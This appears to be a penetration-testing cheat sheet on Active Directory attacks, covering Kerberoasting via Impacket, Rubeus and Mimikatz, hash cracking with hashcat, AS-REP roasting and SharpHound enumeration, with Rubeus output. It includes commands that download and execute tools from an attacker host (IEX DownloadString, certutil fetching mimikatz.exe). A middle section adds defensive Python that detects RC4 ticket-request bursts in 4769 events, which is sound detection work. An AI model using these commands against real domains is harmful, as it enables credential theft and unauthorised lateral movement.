AD Lateral Movement
Obtaining a Kerberos ticket with Rubeus
## Impacket method
```bash
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
```
## Mimikatz method
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
# Request a service ticket for the SPN; it is cached in the current logon session
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
# Export the cached tickets to .kirbi files
.\mimikatz.exe 'kerberos::list /export' exit
```
```
C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt
Rubeus.exe kerberoast /outfile:hash.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1

[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 3
[*] SamAccountName : ExchangeService
[*] DistinguishedName : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName : HTTP/ExchangeService.xor.com
[*] PwdLastSet : 5/20/2019 1:07:08 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt
```
```bash
python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt /home/gerh/Escritorio/OSCP/Machines/host-123/KERBEROS/4-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi
hashcat --force -m 13100 hash-end.txt /usr/share/wordlists/rockyou.txt
```
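On the detection side, the Rubeus notice about forcing RC4_HMAC and the three roastable accounts above describe a visible pattern: one requester obtaining RC4 service tickets for several user-backed service accounts within seconds. The following is an added example, not part of the original page; it assumes Security event 4769 records already exported as dictionaries keyed by the event's EventData field names, and every sample value except `ExchangeService` and `XOR.COM` is constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, shown as RC4_HMAC in the Rubeus output

def ev(ts, user, service, etype, ip="::ffff:10.10.10.50", status="0x0"):
    """Build one constructed 4769 record (service ticket requested)."""
    return {"TimeCreated": ts, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}

# Constructed sample data; account names other than ExchangeService are made up.
SAMPLE_EVENTS = [
    ev("2024-01-10T08:59:40", "alice@XOR.COM", "XOR-APP23$", "0x12"),  # AES, machine account
    ev("2024-01-10T09:00:01", "bob@XOR.COM", "ExchangeService", "0x17"),
    ev("2024-01-10T09:00:02", "bob@XOR.COM", "svc_sql", "0x17"),
    ev("2024-01-10T09:00:02", "bob@XOR.COM", "svc_web", "0x17"),
    ev("2024-01-10T09:00:03", "bob@XOR.COM", "krbtgt", "0x17"),  # TGT service, ignored
    ev("2024-01-10T11:30:00", "carol@XOR.COM", "svc_sql", "0x17", ip="::ffff:10.10.10.61"),
    ev("2024-01-10T11:31:00", "carol@XOR.COM", "svc_legacy", "0x17", status="0x1b"),  # failed
]

def is_candidate(e):
    """Successful RC4 ticket request for a user-backed (non-machine) service."""
    svc = e["ServiceName"]
    return (e["Status"] == "0x0"
            and int(e["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def find_bursts(events, min_services=3, window=timedelta(minutes=2)):
    """Alert on requesters that got RC4 tickets for at least min_services
    distinct service accounts inside one time window."""
    by_requester = defaultdict(list)
    for e in filter(is_candidate, events):
        by_requester[(e["TargetUserName"], e["IpAddress"])].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    alerts = []
    for (user, ip), hits in by_requester.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            services = {s for t, s in hits[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts.append({"user": user, "ip": ip, "first_seen": start.isoformat(),
                               "services": sorted(services)})
                break  # one alert per requester is enough
    return alerts

if __name__ == "__main__":
    print(*find_bursts(SAMPLE_EVENTS), sep="\n")
```

The threshold and window are tuning knobs; in an environment where service accounts are AES-only, any single successful RC4 request for one of them is worth reviewing (`min_services=1`).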
## AS-REP
```
Rubeus.exe asreproast
# Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User
hashcat -m 18200 hash.txt Pass.txt
```
## SHARPHOUND
```powershell
.\SharpHound.exe -c all
PS C:\htb> Import-Module .\SharpHound.ps1
PS C:\htb> Invoke-BloodHound -CollectionMethod all
```